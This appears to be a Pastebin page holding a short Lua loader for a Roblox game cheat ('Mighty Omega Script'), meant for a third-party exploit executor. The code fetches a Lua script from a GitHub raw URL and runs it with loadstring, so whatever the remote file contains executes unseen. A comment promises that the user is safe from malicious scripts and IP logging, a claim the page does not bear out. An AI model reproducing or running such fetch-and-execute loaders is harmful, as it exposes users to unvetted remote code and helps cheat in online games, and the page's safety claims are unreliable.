Advertisement
Guest User

Mighty Omega Script

a guest
Feb 8th, 2022
1,013
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.57 KB | None | 0 0
  1. coroutine.wrap(function()local rq=request or http_request or (http and http.request) or (syn and syn.request)assert(rq and loadstring and getgenv,'Executor not supported.')
  2. local credit='guardscripts'
  3. local url=('https://raw.githubusercontent.com/%s/myscripts/main/scriptinit.lua'):format(credit)
  4. init=loadstring(rq({Url=url}).Body)getgenv().xscriptId='MzI2MjVy'
  5. init()--[[You will be safe from potentially malicious scripts on guard.lol. We set a safe script environment level, prevent ip logging, disable game shutdowns & kicks, and cache files with zlib compression.]]
  6. end)()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement